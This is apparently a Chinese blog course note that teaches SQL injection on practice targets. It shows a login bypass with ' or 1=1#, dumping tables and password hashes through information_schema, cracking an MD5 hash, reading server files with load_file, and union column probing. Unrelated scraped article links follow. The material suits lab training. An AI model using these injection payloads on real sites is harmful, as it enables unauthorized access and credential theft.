Lyx-0607
Lyx-0607

sql注入(仅供参考不可实践)

1.什么是sql注入?

用户(黑客)输入的参数(恶意的数据),被拼接到Sql语句中,作为sql语句的一部分被正常执行了。

 

第一个案例:万能密码登录

a.部署news靶场

news靶场是一个新闻管理系统。这个web应用是存在sql注入漏洞的。

b.news 新闻网站后台登录:

1.黑客在表单中输入的数据:

用户名: ' or 1=1#

密码: 123

2.后台的php代码

$username=" ' or 1=1# ";
$password='123';
 # 这条sql语句查询的结果不为空,可以登录成功 
 select  userid  from  news_users 
 where  username = ' ' or 1=1# ' and password='123' 
select userid from news_users 
where username = 'admin' and password='123456'

3.实验代码

use news;
# 1.正常语句登录失败的
select userid from news_users 
where username = 'ntd2304' and password='e10adc3949ba59abbe56e057f20f883e';
# 2.正常语句登录成功的
select userid from news_users 
where username = 'admin' and password='e10adc3949ba59abbe56e057f20f883e';
# 3.黑客输入特殊数据登录成功的
select userid from news_users 
where username = ' ' or 1=1# ' and password='e10adc3949ba59abbe56e057f20f883e'

 

 

e10adc3949ba59abbe56e057f20f883e的原始密码是什么?123456

访问 cmd5网站: https://www.cmd5.com/

输入hash值: e10adc3949ba59abbe56e057f20f883e ,得到 123456。

2.部署靶场环境

1.news靶场 (我们提供的)

2.pikachu靶场(web应用综合靶场),网上都有通关教程

3.sqli_labs靶场 (专门针对sql注入的靶场),网上都有通关教程

 

3.Sql基础

3.0 基本的查询案例

use pikachu;
select * from pikachu.member;
select * from pikachu.member where sex='girl';
select * from member where id>=5;
select * from member where id!=3;
select * from member where id in (2,4,6,8);
select * from member where id not in (2,4,6,8);
select * from member where id between 3 and 5;
select * from member where id=3 or id=5;
select * from member where id=7 and sex='girl';
# 模糊查询
# 1.查找手机号以136开头的记录
select * from member where phonenum like '136%';
# 2.查找手机号以3作为结尾的记录
select * from member where phonenum like '%3'; 
# 3.查询姓名中包含字母n的记录
select * from member where username like '%n%';

 

3.1Sql字符串函数案例:

/*
字符串函数
*/
# 返回字节长度
select length('hello世界');
# 返回'hello世界'中的'世界',位置从1开始
select substr('hello世界',6,2);
# 返回'hello世界'中的'hello'
select left('hello世界',5);
# 字符串连接
select concat('hello','世界');
# 同一个分组的多个字符串连接成一个字符串(列变行,每个数据之间以逗号分割)
select username from pikachu.member;
select group_concat(username) from pikachu.member;
# 返回字符串中第一个字符的ascii码值 a=>97  A=>65  0=>48
select ascii('Abc');
# 将字符串转换为十六进制  A=>65=>41
select hex('ABC');
# 将 "lucy,lili,kevn" 转换为十六进制
select hex('lucy,lili,kevn');

sql注入(仅供参考不可实践)_第1张图片

 

3.2 系统信息函数

/*
 获取数据库系统相关信息
*/
# 1. 获取mysql的版本
select version();
# 2. 获取当前数据库的名称
select database();
# 3.获取当前用户
select user();
# 4. 返回数据库路径
select @@datadir;

渗透测试时,为什么需要关注mysql的版本?

在Mysql5.0以上的数据库中可以使用information_schema数据库来查看该数据的所有库、表、列名等信息,这对数据库拖库十分有帮助,因此我们在渗透测试阶段需要对Mysql数据库的版本多进行留意,利用information_schema这个数据库获取到我们需要的信息。

3.3使用load_file函数读取文件

1.修改mysql的配置文件my.ini。打开phpstudy窗口,"其他选项菜单"→"打开配置文件"→mysql-ini。

2.在文件中增加以下内容:secure_file_priv=''

3.在phpstudy窗口中, 点击重启按钮

4.打开mysql命令行窗口,执行命令: mysql-> select load_file('d:/hello.txt')

如果没有 secure_file_priv 则新增
1.指定目录:secure_file_priv=/path/to/data
2.不限目录:secure_file_priv=''      
3.禁止操作:secure_file_priv=NULL 或没有这一项内容

高级sql练习:

/*
 高级用法
*/
# 1. 条件函数
select if(10>5,'success','failed');
# 2. 休眠函数
# select sleep(3);
# 3. 随机数,生成0~1之间的随机数
select rand();
# 4.利用mysql读取文件
select  load_file ('D:/phpStudy/WWW/news/include/database.inc.php');

 

 

3.4 Sql注入的前置知识

  1. information_schema库(其它数据库的元数据,有其它数据库结构的信息)

information_schema 是mysql5.0以上版本中自带的一个数据库。

2. tables表

information_schema库中的tables表中table_schema列(存储数据库名)和table_name列(存储表名)

  1. columns表

information_schema库中的columns表中table_schema列(存储数据库名)、table_name列(存储表名)、column_name列(存储列名)。

 

已知mysql的版本是5.5,当前数据库名是news。

1.根据information_schema库中的信息获取news库的所有表;

2.获取news库的news_users表的所有字段

3.获取news库的news_users表的所有数据

4.如果数据中有密码的hash值,尝试使用cmd5.com这个网站查询得到明文的口令

10:05回来

select * from information_schema.tables;
select table_schema,table_name from information_schema.tables;

 # 1.获取news数据库的所有表名 
select table_name from information_schema.tables 
where table_schema='news';

 # 2.获取news数据库的news_users表的所有字段名 
select column_name from information_schema.columns
where table_schema='news' and  table_name='news_users';

 #3.获取news数据库的news_users表的username,passowd字段的数据 
select username,password from news.news_users;

作业:(剩余的时间)

1.根据information_schema库中的信息获取pikachu库的所有表;

2.获取pikachu库的users表的所有字段

3.获取pikachu库的users表的所有数据

4.如果数据中有密码的hash值,尝试使用cmd5.com这个网站查询得到明文的口令

###################参考############################
# 1. 当前mysql的版本>5.0,存在information_schema这个库
select version();
# 2. 获取当前数据库:news
select database();
# 3. news库中有哪些表
# 所有表的信息存储在 information_schema.tables 表中
select table_schema,table_name from information_schema.tables
where table_schema='news';
# 4.查看news库的news_users表中有哪些字段
# 所有字段的信息存储在 information_schema.columns 表中 
select table_name,column_name from information_schema.columns
where table_schema='news' and table_name='news_users';
# 5.查看news_users表的userid\username\password字段的值
# 获取的值: 1 admin e10adc3949ba59abbe56e057f20f883e
select userid,username,password from news_users;

# 6. hash: e10adc3949ba59abbe56e057f20f883e
# 通过cmd5.com网站查询获取到原始口令: 123456

# 7. 可以使用admin/123456登录到网站后台

 

order by与union的使用

# 1.通过不断修改order by后面的值, 判断查询结果中有多少列 
select * from news.news_users order by 3;
 # 2. union -联合查询
# union 前后 字段数量 相等, 类型没要求 。 
select * from news.news_users  union  select 1,2,3;

 

你可能感兴趣的:(笔记)

  • 小红书限流怎么解决,小红书笔记被限流怎么办 优惠券高省
    小红书被限流了怎么办?这可能是网络上提到的比较多的问题,的确,小红书被限流以后,心里都是很着急的,这样会直接营销到我们的流量和收入,所以想要尽快的解决这个问题。那么今天就来给大家分享一下:2022年小红书限流恢复方法,当然方法并不适用于所有人所有账号,因为账号类型的不同,小红书限流的原因也不同,所以你的小红书被限流以后,还是需要具体原因具体分析。在解决限流问题以前:先来判断一下自己的限流情况,是整
  • 【学习笔记】为什么你会恐惧盈利?(下) 坤乾泰
    JonahComplex.jpg【恐惧盈利的根本原因】交易者之所以会恐惧盈利,主要是因为不够自信,而这种不自信可能来自以下几个方面:1、没有交易系统,或者系统还不稳定。2、抱有错误的期望值。3、对自己交易的品种不熟悉。4、没有正确认识自己的负面情绪。【如何克服这些不良心态?】1、放宽心态,正确看待盈亏。不管是厌恶亏损还是恐惧盈利,首先要放宽自己的心态,学会更加坦然地去面对盈利和亏损。这看似简单,但
  • DayThirteen 笔记 隔壁班胡胖胖 这个七月
    使用sort函数时,可以传入第三个参数,作为排序的顺序参考,例如:boolcmp(paira,pairb){returna.second>b.second;//从大到小排序}intmain(){sort(danjia,danjia+n,cmp);}记录一个求幂函数的二分算法LLbineryPow(LLa,LLb,LLm)//递归写法{if(b==0)return1;//如果幂为0,啧直接返回//这
  • 有花堪折直须折,莫待无花空折枝 4763f7988cd1
    通化883徐敬霞2019年的暑假,我有幸参加了兴成长暑期培训“教育技术信息化2.0能力素养提升”。听课,打卡,让我收获满满,感受多多!图片发自App带着愉悦的心情我共听了七节课,首先是王子老师《微信小程序的创新应用》,唐晓勇校长《技术支持下的学习变革》,梁勇校长《教学PPT的设计与制作》,王思思老师的《跨学科视野下的自然笔记》,朱思思老师的《教学实践中的思维导图》,陈晓粧老师的《学习类PPT的教学
  • 下雨的时候 菡萏_悠云
    窗外,是淅淅沥沥的小雨,客厅里,是略显昏黄的灯光。我手捧着笔记本电脑坐在沙发上,敲击键盘,仿佛要为自己织就一个朦胧美好的梦境。我喜欢下雨的时节。狂风暴雨之时,在温暖的家里,一杯香茗或是一杯牛奶,打开电视追个剧,一个人的宁静世界,充满了温暖珍贵的味道;在淅沥小雨之时,我总是想起那句“随风潜入夜润物细无声”,伴随着缠绵温柔的雨丝,干涸的大地得到滋润,浮躁的内心似乎也能得到慰藉。或许,在下雨的时候,我们
  • 常见问题之Golang——verifying github.com/go-playground/assert/[email protected]/go.mod: checksum mismatch错误 cn華少
    常见问题之Golang——verifyinggithub.com/go-playground/assert/[email protected]/go.mod:checksummismatch错误背景本系列文章均为学习过程中记录的笔记,欢迎和我一起来学习Go语言。全文使用环境如下:操作系统:windows10使用工具:Goland开发工具golang版本:1.17简介本文主要是对我日常在使用golang时遇到的一些
  • 《以色列——一个民族的重生》第四到第六章阅读笔记 惠尔好我
    在奥斯曼帝国统治时期,阿拉伯人就意识到,巴勒斯坦生活的犹太人将改变该地区的“阿拉伯属性”。第一次犹太移民潮中,欧洲犹太人带来的观念和现代性和当地犹太人以及阿拉伯人的意识形态发生冲突。可以说,当地人和外来者对国家和社会抱有的不同理念、对荣誉和记忆的不同感受以及许多其他方面的难以沟通,成为后来犹太人和阿拉伯人长期冲突的重要原因。反观中华民族强大的包容性,同化性,共生性带来了强大的生命力。为了架起各方沟
  • 这可能是全网最详细的 Spring Cloud OAuth2 单点登录使用教程了,妈妈再也不用担心我被面试官吊打了! 2401_84558091 程序员java面试学习
    最后对于很多Java工程师而言,想要提升技能,往往是自己摸索成长,不成体系的学习效果低效漫长且无助。整理的这些资料希望对Java开发的朋友们有所参考以及少走弯路,本文的重点是你有没有收获与成长,其余的都不重要,希望读者们能谨记这一点。再分享一波我的Java面试真题+视频学习详解+技能进阶书籍本文已被CODING开源项目:【一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码】收
  • python中.txt文件的使用【txt读取和写入】 大山很山 pythonpythonwindows服务器
    读取txt的数据和把数据保存到txt中是python处理数据常用的。将学习笔记记录,作备份和参考。十分感谢别人的分享,很详细,学习参考链接如下:pythonPython读写txt文本文件的操作方法全解析教你利用python如何读取txt中的数据一、txt文件读取1python常用的三种读取文件函数read()#一次性读完全部内容readline()#读取第一行内容readlines()#读取文本所
  • Java Kafka生产者实现 stormsha Javawebjavakafkalinq
    欢迎莅临我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。推荐:「stormsha的主页」,「stormsha的知识库」持续学习,不断总结,共同进步,为了踏实,做好当下事儿~专栏导航Python系列:Python面试题合集,剑指大厂Git系列:Git操作技巧GO系列:记录博主学习GO语言的笔记,该笔记专栏
  • 认知笔记(28) 在路上_1
    刘双鹤,焦点解决讲师一期班,心理咨询师,成长分享第1027天,坚持运动第35天(2018.12.27星期四)认知笔记(28)习惯是一种高带宽的专线,也就是说我们需要重复认识相同和类似的事,以后遇到事情才能很快作出决断。但这种直觉思维也会影响我们的认知,使思维固化。建立专线式的高带宽连接,可以大大提高我们的认知效率,让我们在某一个领域或某一个点上成为高手。但是,神经元的连接有一个特点——一旦建立了一
  • Rust 语言从入门到实战 唐刚--学习笔记01 zhanglz888 Rust语言从入门到实战唐刚学习笔记rust学习笔记
    Rust语言从入门到实战唐刚基础篇(11讲)01|快速入门:Rust的基础语法Rust宣称的安全、高性能、无畏并发这些特点,初次接触的时候都是感受不到的。安装Rust编译器套件MacOS或Linux,执行:curl--proto'=https'--tlsv1.2-sSfhttps://sh.rustup.rs|sh按提示操作Windows系统(WSL中/Windows原生平台)WSL中,curl-
  • 读书笔记《干法》我们为什么要工作? 小雨淅淅1987
    我亲戚的儿子,大学本科毕业,天天窝在家里玩游戏也不出去找工作。父母求人找了好几份工作,干不到一个月就辞职不干了。问他原因,不是说太累,就是说没意义,再不就是抱怨报酬太低。反正就是不出去工作。像他这种情况,在我周围不是个例。很现在多年轻人,不为吃穿而犯愁。他们对工作没有热情,不喜欢工作,并且尽能的逃离工作的责任,他们看不到工作的意义。即使找工作,也希望做轻松,报酬高的工作。他们重视个人兴趣,不希望受
  • python编程:从入门到实践--学习笔记--基础知识 123176 python学习笔记
    python编程:从入门到实践--学习笔记--基础知识第二章:变量和简单数据类型第三章:列表简介第四章:操作列表第五章:if语句第六章:字典第七章:用户输入和while循环第八章:函数传递实参第九章:类继承第十章:文件和异常从文件中读取数据写入文件异常存储数据第十一章:测试代码第二章:变量和简单数据类型修改字符串大小:name.title(),name.upper(),name.lower()合并
  • 100天成功笔记营01 庞姣创业笔记
    成长日记打卡:第1天/100天,学以致用,知行合一。每日要事:1、成长日记打卡第1天要点记录一下:注册图文类账号,目前有公众号,其他的陆续注册:百家号、大鱼号、公众号、、趣头条、今日头条、微博、新浪博客、企鹅号、搜狐号特别提醒:截止每天晚上23:00前(最迟不可超过23:30)以发到朋友圈的截图为准做考勤。2、完成蜕变挑战营作业及考勤参加蜕变挑战营20天以来,每天按时完成作业,督促15队所有队员完
  • C语言学习笔记:内存的五大分区 五虎蘸酱 C语言学习笔记c语言开发语言
    在C语言中,进程可在内存中分别存入五大分区:1、text:也称为代码段,其中主要用于存放二进制指令、常量、被const修饰过的初始化过的全局变量、静态局部变量;该分区为只读权限,若强制修改将会产生段错误。2、data:也称为数据段,其中主要用于存放初始化过的全局变量、静态局部变量。3、bss:也称为静态数据段,主要用于存放未初始化过的全局变量、静态局部变量。Ps:该段内存在进程运行前自动清理为04
  • C语言详细笔记--动态存储分配 Jasmine5606 C语言c语言笔记算法c#开发语言
    动态存储分配是指程序运行过程中在需要时显示地申请内存空间、在不需要时释放内存空间的一种方法。通过使用动态存储分配,程序员可以在函数执行部分的任何地方使用动态存储分配函数或者回收内存空间,从而有效地使用内存空间。目录一、malloc()函数二、free()函数一、malloc()函数malloc()函数用于分配内存空间,函数原型如下:void*malloc(unsignedintsize);功能:在
  • 读书笔记---阻碍财富自由的三大坑 午夜醉猫
    亲爱的家人们,大家早安!我们今天要聊的话题是,阻碍财富自由的三大坑:莫名其妙的凑热闹、心急火燎的随大流,以及操碎了别人的心肝。让我们来看看,追求财富自由的我们,是否就在自己还不知情的时候,已经蹲在哪个坑里了。听过这么一个笑话吗?大街上有小伙昂首望天,有好奇的人走到他身边,也抬头寻找,接着是第二个,第三个……直到流鼻血的小伙低下头,莫名其妙的发现身边已经围了一群抬头望天的人。现在流行上网,那比街上有
  • 何丹的ScalersTalk第四轮新概念朗读持续力训练Day3020181106 - 何丹的小世界
    l30footballorpolo图片发自App任务配置:五项全能知识笔记音标图片发自App图片发自App朗读图片发自App复述图片发自App点评@[00]-纸多糖-廊坊-学生你好。注意一下like多了s,rowing的əʊ读成了rɔɪ,boat读成了bɒ。@[00]庭茜-天津-IT一如既往的赞啊。语音语调都把握非常好.今天有几处需要注意一下:did.not你读成了didn't,runaway的a
  • 恢复 iPhone 上误删除笔记的 5 种绝佳方法 分享者花花 数据恢复数据恢复软件手机数据恢复iphone笔记ioswordandroid智能手机手机
    您想知道如何恢复iPhone上误删除的笔记吗?阅读本指南,了解5种简单方法,可直接或通过iTunes/iCloud备份检索iPhone上丢失或删除的笔记。iPhoneNotes应用程序提供了一种方便的方式来记录重要信息,包括文本、图片、链接和许多其他类型的信息。但是,各种原因仍可能导致iPhone数据丢失。“如何在iPhone上恢复丢失的笔记?”幸运的是,这篇文章将向您展示一些有效的解决方案,即使
  • 2023-10-18 祝澜
    祝澜2121天2023-10-18读书笔记:变态心理学是一门以心理与行为异常表现为研究对象的心理学分支。它主要研究如何定义心理异常,心理异常的发生、种类、性质和特点,具体表现形式以及心理异常造成的痛苦体验、认知功能和社会功能的损伤等。变态心理学的研究对象,同时也是精神病学的对象。只是各自的侧重点不同。
  • 转码日记——Javascript笔记(8) zzcoding_ 转码日记数据结构javascript前端开发语言
    数组(Array)数组也是一个对象,和普通对象功能类似。普通对象使用字符串作为属性名,而数组使用数字来作为索引操作。索引:从0开始的整数。数组的存储效率比较高,对属性名没有要求的时候可以使用。基本应用//创建数组对象vararr=newArray();//向数组中添加对象//语法:数组[索引]=值;arr[0]=10;arr[1]=33;//如果读取不存在的索引则返回undefined//获取数组
  • 刘大杰《中国文学发展史》读书笔记48 小神仙记录薄
    短篇小说的进展(一)严格地说起来,我国六朝时代的小说,还没有成形。这并不是因其内容的荒谬,而是因其形式与描写的拙劣与贫弱。六朝的作品,只是一些没有结构的残丛小语式的杂记,叙事没有布置,文笔亦极俗浅,实在还算不得小说。中国的文言短篇小说,在艺术上发生价值,在文学史上获得地位,是起于唐代的传奇。那些传奇,建立了相当完满的短篇小说的形式,由杂记式的残丛小语,变为洋洋大篇的文字,由三言两语的记录,变为非常
  • 个人笔记--python代码--储存数据 pdc31czy 个人笔记Pythonpython笔记
    1.存储Error(txt文件)importnumpyasnp#Errorerror_u=np.linalg.norm(exact_u_current-predict_np_u,2)/np.linalg.norm(exact_u_current,2)error_v=np.linalg.norm(exact_v_current-predict_np_v,2)/np.linalg.norm(exact
  • 【110】《做有故事的教育》读书笔记(一百二十九)2023-02-13 南风如我意
    -----------《做有故事的教育》读书笔记(八)文/李现风2023年读书笔记读书笔记以以下三个出发点为目的:一、书中的思想,提升自己的教育理念;二、书中的值得借鉴的做法,提升自己的教育技巧;三、书中的美句,有鉴于哲理性的句子,提升自己文章的语言魅力和教育文化水准。读《做有故事的教育》作者王维审读书八:第二章学会用故事经营常规教育三我的故事型家长会67.家长们似乎理解了故事的玄妙之处,也理解了
  • 【html+css网站设计】 小翔很开心 htmlcss前端
    学习笔记:HTML基础概念1.vscode常用设置1.1打开文件1.2新建文件1.3自动保存(ctrl+S)1.4文件重命名1.5删除文件2.vscode常用快捷键2.1自动补全HTML基本结构2.2标签自动补全2.3复制当前行|复制多行2.4删除当前行|删除多行2.5单行注释|取消单行注释2.6多行注释|取消多行注释2.7统一编辑2.8生成多个2.9文字2.10打开浏览器2.11快捷键可以组合使
  • 学习小组Day3笔记--安之若素 安之若素_9e53
    Conda的安装与初步使用Conda是Linux环境下的软件安装与管理工具相当于应用商店,日常生信使用miniconda即可miniconda的下载与安装从清华镜像下载miniconda3安装包wgethttps://mirrors.tuna.tsinghua.edu.cn/anaconda/miniconda/Miniconda3-latest-Linux-x86_64.sh安装minicond
  • 【Python笔记】向量:@classmethod与 @staticmethod。零基础 万物皆可.C Python笔记python
    类成员比较@classmethod与@staticmethod共同点:两个都是装饰器,装饰的成员函数可以通过类名.方法名(…)来调用区别:最显著的特点是classmethod需要传递一个参数cls,而staticmethod不需要。因此可以访问、修改类的属性,类的方法,实例化对象等,避免硬编码;而staticmethod不行,classmethod可以判断出自己是通过基类被调用,还是通过某个子类被
  • 《响应式 Web 设计:纯 HTML 和 CSS 的实现技巧》 陈在天box 前端htmlcss
    一、引言在当今数字化时代,人们使用各种不同的设备访问网页,包括台式电脑、笔记本电脑、平板电脑和智能手机等。为了确保网页在不同设备上都能提供良好的用户体验,响应式Web设计变得至关重要。响应式Web设计是一种能够根据设备屏幕大小和分辨率自动调整布局和样式的设计方法。本文将深入探讨如何使用纯HTML和CSS实现响应式Web设计,分享一些实用的技巧和最佳实践。二、响应式Web设计的重要性(一)满足不同设
  • Python的Pillow(图像处理库)非常详细的学习笔记 深蓝海拓 机器视觉pillow学习笔记pillow计算机视觉python图像处理
    Python的Pillow库是一个非常强大的图像处理库。安装Pillow库:在终端或命令行中输入以下命令来安装Pillow:pipinstallpillow安装后查看是否安装成功以及当前版本pipshowPillow升级库:pipinstallpillow--upgrade 一些基础的应用1、图像文件方面的:打开文件1)直接打开文件:这种方式是最常见的直接打开图片文件的方法,以文件路径作为参数,P
  • ASM系列五 利用TreeApi 解析生成Class lijingyao8206 ASM字节码动态生成ClassNodeTreeAPI
       前面CoreApi的介绍部分基本涵盖了ASMCore包下面的主要API及功能,其中还有一部分关于MetaData的解析和生成就不再赘述。这篇开始介绍ASM另一部分主要的Api。TreeApi。这一部分源码是关联的asm-tree-5.0.4的版本。          在介绍前,先要知道一点, Tree工程的接口基本可以完
  • 链表树——复合数据结构应用实例 bardo 数据结构树型结构表结构设计链表菜单排序
    我们清楚:数据库设计中,表结构设计的好坏,直接影响程序的复杂度。所以,本文就无限级分类(目录)树与链表的复合在表设计中的应用进行探讨。当然,什么是树,什么是链表,这里不作介绍。有兴趣可以去看相关的教材。 需求简介: 经常遇到这样的需求,我们希望能将保存在数据库中的树结构能够按确定的顺序读出来。比如,多级菜单、组织结构、商品分类。更具体的,我们希望某个二级菜单在这一级别中就是第一个。虽然它是最后
  • 为啥要用位运算代替取模呢 chenchao051 位运算哈希汇编
        在hash中查找key的时候,经常会发现用&取代%,先看两段代码吧,     JDK6中的HashMap中的indexFor方法: /** * Returns index for hash code h. */ static int indexFor(int h, int length) {
  • 最近的情况 麦田的设计者 生活感悟计划软考
          今天是2015年4月27号      整理一下最近的思绪以及要完成的任务             1、最近在驾校科目二练车,每周四天,练三周。其实做什么都要用心,追求合理的途径解决。为
  • PHP去掉字符串中最后一个字符的方法 IT独行者 PHP字符串
    今天在PHP项目开发中遇到一个需求,去掉字符串中的最后一个字符 原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6 代码如下: $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr;
  • hadoop在linux上单机安装过程 _wy_ linuxhadoop
    1、安装JDK     jdk版本最好是1.6以上,可以使用执行命令java -version查看当前JAVA版本号,如果报命令不存在或版本比较低,则需要安装一个高版本的JDK,并在/etc/profile的文件末尾,根据本机JDK实际的安装位置加上以下几行:    export JAVA_HOME=/usr/java/jdk1.7.0_25  
  • JAVA进阶----分布式事务的一种简单处理方法 无量 多系统交互分布式事务
    每个方法都是原子操作: 提供第三方服务的系统,要同时提供执行方法和对应的回滚方法 A系统调用B,C,D系统完成分布式事务 =========执行开始======== A.aa(); try { B.bb(); } catch(Exception e) { A.rollbackAa(); } try { C.cc(); } catch(Excep
  • 安墨移动广 告:移动DSP厚积薄发 引领未来广 告业发展命脉 矮蛋蛋 hadoop互联网
      “谁掌握了强大的DSP技术,谁将引领未来的广 告行业发展命脉。”2014年,移动广 告行业的热点非移动DSP莫属。各个圈子都在纷纷谈论,认为移动DSP是行业突破点,一时间许多移动广 告联盟风起云涌,竞相推出专属移动DSP产品。   到底什么是移动DSP呢?   DSP(Demand-SidePlatform),就是需求方平台,为解决广 告主投放的各种需求,真正实现人群定位的精准广
  • myelipse设置 alafqq IP
      在一个项目的完整的生命周期中,其维护费用,往往是其开发费用的数倍。因此项目的可维护性、可复用性是衡量一个项目好坏的关键。而注释则是可维护性中必不可少的一环。 注释模板导入步骤  安装方法: 打开eclipse/myeclipse 选择 window-->Preferences-->JAVA-->Code-->Code
  • java数组 百合不是茶 java数组
    java数组的   声明  创建  初始化;   java支持C语言      数组中的每个数都有唯一的一个下标 一维数组的定义 声明: int[] a = new int[3];声明数组中有三个数int[3] int[] a 中有三个数,下标从0开始,可以同过for来遍历数组中的数
  • javascript读取表单数据 bijian1013 JavaScript
    利用javascript读取表单数据,可以利用以下三种方法获取: 1、通过表单ID属性:var a = document.getElementByIdx_x_x("id"); 2、通过表单名称属性:var b = document.getElementsByName("name"); 3、直接通过表单名字获取:var c = form.content.
  • 探索JUnit4扩展:使用Theory bijian1013 javaJUnitTheory
    理论机制(Theory) 一.为什么要引用理论机制(Theory)         当今软件开发中,测试驱动开发(TDD — Test-driven development)越发流行。为什么 TDD 会如此流行呢?因为它确实拥有很多优点,它允许开发人员通过简单的例子来指定和表明他们代码的行为意图。 TDD 的优点:     &nb
  • [Spring Data Mongo一]Spring Mongo Template操作MongoDB bit1129 template
    什么是Spring Data Mongo Spring Data MongoDB项目对访问MongoDB的Java客户端API进行了封装,这种封装类似于Spring封装Hibernate和JDBC而提供的HibernateTemplate和JDBCTemplate,主要能力包括 1. 封装客户端跟MongoDB的链接管理 2. 文档-对象映射,通过注解:@Document(collectio
  • 【Kafka八】Zookeeper上关于Kafka的配置信息 bit1129 zookeeper
    问题: 1. Kafka的哪些信息记录在Zookeeper中 2. Consumer Group消费的每个Partition的Offset信息存放在什么位置 3. Topic的每个Partition存放在哪个Broker上的信息存放在哪里 4. Producer跟Zookeeper究竟有没有关系?没有关系!!!   //consumers、config、brokers、cont
  • java OOM内存异常的四种类型及异常与解决方案 ronin47 java OOM 内存异常
           OOM异常的四种类型:       一: StackOverflowError :通常因为递归函数引起(死递归,递归太深)。-Xss 128k 一般够用。        二: out Of memory: PermGen Space:通常是动态类大多,比如web 服务器自动更新部署时引起。-Xmx
  • java-实现链表反转-递归和非递归实现 bylijinnan java
    20120422更新: 对链表中部分节点进行反转操作,这些节点相隔k个: 0->1->2->3->4->5->6->7->8->9 k=2 8->1->6->3->4->5->2->7->0->9 注意1 3 5 7 9 位置是不变的。 解法: 将链表拆成两部分: a.0-&
  • Netty源码学习-DelimiterBasedFrameDecoder bylijinnan javanetty
    看DelimiterBasedFrameDecoder的API,有举例: 接收到的ChannelBuffer如下: +--------------+ | ABC\nDEF\r\n | +--------------+ 经过DelimiterBasedFrameDecoder(Delimiters.lineDelimiter())之后,得到: +-----+----
  • linux的一些命令 -查看cc攻击-网口ip统计等 hotsunshine linux
    Linux判断CC攻击命令详解 2011年12月23日 ⁄ 安全 ⁄ 暂无评论 查看所有80端口的连接数 netstat -nat|grep -i '80'|wc -l 对连接的IP按连接数量进行排序 netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 查看TCP连接状态 n
  • Spring获取SessionFactory ctrain sessionFactory
    String sql = "select sysdate from dual"; WebApplicationContext wac = ContextLoader.getCurrentWebApplicationContext(); String[] names = wac.getBeanDefinitionNames(); for(int i=0; i&
  • Hive几种导出数据方式 daizj hive数据导出
    Hive几种导出数据方式   1.拷贝文件   如果数据文件恰好是用户需要的格式,那么只需要拷贝文件或文件夹就可以。 hadoop fs –cp source_path target_path   2.导出到本地文件系统   --不能使用insert into local directory来导出数据,会报错 --只能使用
  • 编程之美 dcj3sjt126com 编程PHP重构
    我个人的 PHP 编程经验中,递归调用常常与静态变量使用。静态变量的含义可以参考 PHP 手册。希望下面的代码,会更有利于对递归以及静态变量的理解   header("Content-type: text/plain"); function static_function () { static $i = 0; if ($i++ < 1
  • Android保存用户名和密码 dcj3sjt126com android
    转自:http://www.2cto.com/kf/201401/272336.html 我们不管在开发一个项目或者使用别人的项目,都有用户登录功能,为了让用户的体验效果更好,我们通常会做一个功能,叫做保存用户,这样做的目地就是为了让用户下一次再使用该程序不会重新输入用户名和密码,这里我使用3种方式来存储用户名和密码 1、通过普通 的txt文本存储 2、通过properties属性文件进行存
  • Oracle 复习笔记之同义词 eksliang Oracle 同义词Oracle synonym
    转载请出自出处:http://eksliang.iteye.com/blog/2098861 1.什么是同义词       同义词是现有模式对象的一个别名。       概念性的东西,什么是模式呢?创建一个用户,就相应的创建了 一个模式。模式是指数据库对象,是对用户所创建的数据对象的总称。模式对象包括表、视图、索引、同义词、序列、过
  • Ajax案例 gongmeitao Ajaxjsp
    数据库采用Sql Server2005 项目名称为:Ajax_Demo 1.com.demo.conn包 package com.demo.conn; import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException; //获取数据库连接的类public class DBConnec
  • ASP.NET中Request.RawUrl、Request.Url的区别 hvt .netWebC#asp.nethovertree
      如果访问的地址是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree%3C&n=myslider#zonemenu那么Request.Url.ToString() 的值是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree<&
  • SVG 教程 (七)SVG 实例,SVG 参考手册 天梯梦 svg
    SVG 实例 在线实例 下面的例子是把SVG代码直接嵌入到HTML代码中。 谷歌Chrome,火狐,Internet Explorer9,和Safari都支持。 注意:下面的例子将不会在Opera运行,即使Opera支持SVG - 它也不支持SVG在HTML代码中直接使用。   SVG 实例 SVG基本形状 一个圆 矩形 不透明矩形 一个矩形不透明2 一个带圆角矩
  • 事务管理 luyulong javaspring编程事务
    事物管理 spring事物的好处 为不同的事物API提供了一致的编程模型 支持声明式事务管理 提供比大多数事务API更简单更易于使用的编程式事务管理API 整合spring的各种数据访问抽象 TransactionDefinition 定义了事务策略 int getIsolationLevel()得到当前事务的隔离级别 READ_COMMITTED 
  • 基础数据结构和算法十一:Red-black binary search tree sunwinner AlgorithmRed-black
      The insertion algorithm for 2-3 trees just described is not difficult to understand; now, we will see that it is also not difficult to implement. We will consider a simple representation known
  • centos同步时间 stunizhengjia linux集群同步时间
    做了集群,时间的同步就显得非常必要了。 以下是查到的如何做时间同步。 在CentOS 5不再区分客户端和服务器,只要配置了NTP,它就会提供NTP服务。 1)确认已经ntp程序包: # yum install ntp 2)配置时间源(默认就行,不需要修改) # vi /etc/ntp.conf server pool.ntp.o
  • ITeye 9月技术图书有奖试读获奖名单公布 ITeye管理员 ITeye
    ITeye携手博文视点举办的9月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 9月试读活动回顾:http://webmaster.iteye.com/blog/2118112本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀):      《NFC:Arduino、Andro
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他